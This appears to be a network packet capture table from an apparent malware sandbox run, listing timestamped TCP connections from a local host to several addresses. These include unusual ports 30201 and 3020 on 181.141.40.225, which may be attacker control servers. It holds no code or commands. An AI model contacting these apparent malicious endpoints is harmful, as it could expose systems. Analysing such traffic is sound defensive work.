                                                                                                    Nov 19, 2024 15:57:25.670953035 CET49748443192.168.2.523.1.237.91
                                                                                                    Nov 19, 2024 15:57:25.672229052 CET49748443192.168.2.523.1.237.91
                                                                                                    Nov 19, 2024 15:57:25.672264099 CET4434974823.1.237.91192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.672420025 CET49748443192.168.2.523.1.237.91
                                                                                                    Nov 19, 2024 15:57:25.672427893 CET4434974823.1.237.91192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.689811945 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.690020084 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.690112114 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.690187931 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.690463066 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.690521955 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.690788031 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.690845966 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.691076040 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.691143036 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.691369057 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.691435099 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.691653013 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.691713095 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.691930056 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.691986084 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.691998005 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.692045927 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.692054987 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.692079067 CET4434974269.49.234.173192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.692126989 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.695297956 CET49742443192.168.2.569.49.234.173
                                                                                                    Nov 19, 2024 15:57:25.720851898 CET4434974913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.721445084 CET49749443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.721487045 CET4434974913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.721497059 CET4434975013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.722150087 CET49750443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.722177029 CET4434975013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.722933054 CET4434975113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.723098040 CET49749443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.723110914 CET4434974913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.723114967 CET49750443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.723124981 CET4434975013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.723454952 CET49751443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.723484993 CET4434975113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.723905087 CET49751443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.723915100 CET4434975113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.725996017 CET4434975313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.726351976 CET49753443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.726372004 CET4434975313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.726845980 CET49753443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.726855040 CET4434975313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.750060081 CET4434975213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.750585079 CET49752443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.750602961 CET4434975213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.750957012 CET49752443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.750963926 CET4434975213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.774167061 CET4975430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:25.779122114 CET3020149754181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.779244900 CET4975430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:25.786147118 CET4975430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:25.791131973 CET3020149754181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.791225910 CET4975430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:25.796252966 CET3020149754181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.816257954 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:25.819500923 CET4434975013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.819811106 CET4434975013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.819891930 CET49750443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.819962978 CET49750443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.819962978 CET49750443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.819999933 CET4434975013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.820025921 CET4434975013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.821187019 CET4434975313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.821199894 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.821324110 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:25.821341991 CET4434974913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.821382999 CET4434975313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.821438074 CET49753443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.821902990 CET49753443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.821921110 CET4434975313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.821948051 CET49753443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.821954966 CET4434975313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.821959972 CET4434974913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.822016954 CET49749443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.822220087 CET4434975113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.822426081 CET4434975113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.822427988 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:25.822520018 CET49751443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.822609901 CET49749443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.822609901 CET49749443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.822647095 CET4434974913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.822659969 CET4434974913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.823810101 CET49751443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.823827028 CET4434975113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.823848963 CET49751443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.823862076 CET4434975113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.824654102 CET49756443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.824683905 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.824754000 CET49756443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.825263023 CET49756443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.825279951 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.826539040 CET49757443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.826562881 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.826649904 CET49757443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.826859951 CET49757443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.826874971 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.827363968 CET49758443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.827374935 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.827378988 CET49759443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.827389002 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.827466965 CET49759443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.827486992 CET49758443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.827550888 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.827593088 CET49759443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.827598095 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.827673912 CET49758443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.827678919 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.876434088 CET4434974823.1.237.91192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.877103090 CET4434974823.1.237.91192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.877760887 CET49748443192.168.2.523.1.237.91
                                                                                                    Nov 19, 2024 15:57:25.895178080 CET4434975213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.895670891 CET4434975213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.895914078 CET49752443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.904746056 CET49752443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.904767990 CET4434975213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.917546988 CET49760443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.917582989 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:25.917751074 CET49760443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.917932034 CET49760443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:25.917948008 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.095788956 CET49748443192.168.2.523.1.237.91
                                                                                                    Nov 19, 2024 15:57:26.095788956 CET49748443192.168.2.523.1.237.91
                                                                                                    Nov 19, 2024 15:57:26.095863104 CET4434974823.1.237.91192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.096388102 CET49748443192.168.2.523.1.237.91
                                                                                                    Nov 19, 2024 15:57:26.343216896 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.343844891 CET49756443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.343866110 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.344486952 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.347800970 CET49756443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.347807884 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.348280907 CET49757443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.348292112 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.348933935 CET49757443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.348938942 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.371726036 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.374145985 CET49758443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.374166012 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.374602079 CET49758443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.374618053 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.386918068 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.389435053 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:26.394627094 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.436306953 CET3020149754181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.436383009 CET4975430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:26.438990116 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.439068079 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.439208984 CET49756443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.439645052 CET49756443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.439645052 CET49756443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.439659119 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.439667940 CET4434975613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.441607952 CET4975430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:26.441631079 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.442035913 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.442096949 CET49757443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.443516970 CET49761443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.443591118 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.443834066 CET49761443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.443862915 CET49757443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.443877935 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.443892956 CET49757443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.443900108 CET4434975713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.444916010 CET49761443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.444945097 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.446394920 CET3020149754181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.446413994 CET49762443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.446439028 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.446599960 CET49762443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.446755886 CET49762443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.446767092 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.451214075 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.451641083 CET49760443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.451654911 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.452080965 CET49760443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.452086926 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.461021900 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.465217113 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.465780020 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.468394041 CET49758443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.468651056 CET49758443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.468651056 CET49758443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.468662024 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.468671083 CET4434975813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.472546101 CET49763443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.472587109 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.472733021 CET49763443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.472918034 CET49763443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.472938061 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.511768103 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:26.538429022 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:57:26.543482065 CET8049764178.237.33.50192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.543574095 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:57:26.549321890 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.550224066 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.550286055 CET49760443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.557425022 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.588119030 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:57:26.588622093 CET49760443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.588650942 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.588665962 CET49760443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.588674068 CET4434976013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.588968039 CET4976530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:26.589303017 CET49759443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.589318991 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.589754105 CET49759443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.589761019 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.593100071 CET8049764178.237.33.50192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.593255043 CET49766443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.593311071 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.593518972 CET49766443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.593694925 CET49766443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.593728065 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.594192028 CET3020149765181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.594293118 CET4976530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:26.595170975 CET4976530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:26.600219011 CET3020149765181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.600274086 CET4976530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:26.605130911 CET3020149765181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.679774046 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.679939032 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.680003881 CET49759443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.680213928 CET49759443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.680238008 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.680250883 CET49759443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.680258036 CET4434975913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.683214903 CET49767443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.683310032 CET4434976713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.683408022 CET49767443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.683569908 CET49767443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.683608055 CET4434976713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.973063946 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.973660946 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.974015951 CET49762443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.974030018 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.974462032 CET49762443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.974467993 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.974762917 CET49761443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.974824905 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.975109100 CET49761443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:26.975122929 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.997531891 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.014391899 CET49763443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.014409065 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.015042067 CET49763443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.015054941 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.067007065 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.067074060 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.067306995 CET49761443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.071777105 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.072468996 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.072519064 CET49762443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.080893993 CET49761443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.080935955 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.080955029 CET49761443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.080965042 CET4434976113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.082297087 CET49762443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.082325935 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.082340002 CET49762443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.082346916 CET4434976213.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.084871054 CET49768443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.084904909 CET4434976813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.085724115 CET49768443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.085877895 CET49769443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.085937023 CET4434976913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.085994005 CET49769443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.086169958 CET49768443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.086184025 CET4434976813.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.086327076 CET49769443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.086344957 CET4434976913.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.104985952 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.105305910 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.105530024 CET49763443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.108381033 CET8049764178.237.33.50192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.108454943 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:57:27.111681938 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.112478018 CET49763443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.112502098 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.112602949 CET49763443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.112612009 CET4434976313.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.113140106 CET49766443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.113163948 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.113670111 CET49766443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.113682032 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.129575014 CET49770443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.129601955 CET4434977013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.129951000 CET49770443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.130055904 CET49770443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.130067110 CET4434977013.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.139018059 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:27.143955946 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.199594975 CET4434976713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.200212002 CET49767443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.200258017 CET4434976713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.200726032 CET49767443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.200740099 CET4434976713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.204094887 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.204312086 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.204380035 CET49766443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.204616070 CET49766443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.204616070 CET49766443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.204647064 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.204673052 CET4434976613.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.206938982 CET49771443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.206979990 CET4434977113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.209954977 CET49771443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.210102081 CET49771443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.210117102 CET4434977113.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.218475103 CET3020149765181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.261744022 CET4976530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:57:27.292881966 CET4434976713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.293318987 CET4434976713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.293364048 CET49767443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.298362970 CET49767443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.298397064 CET4434976713.107.246.43192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.298408031 CET49767443192.168.2.513.107.246.43
                                                                                                    Nov 19, 2024 15:57:27.298414946 CET4434976713.107.246.43192.168.2.5
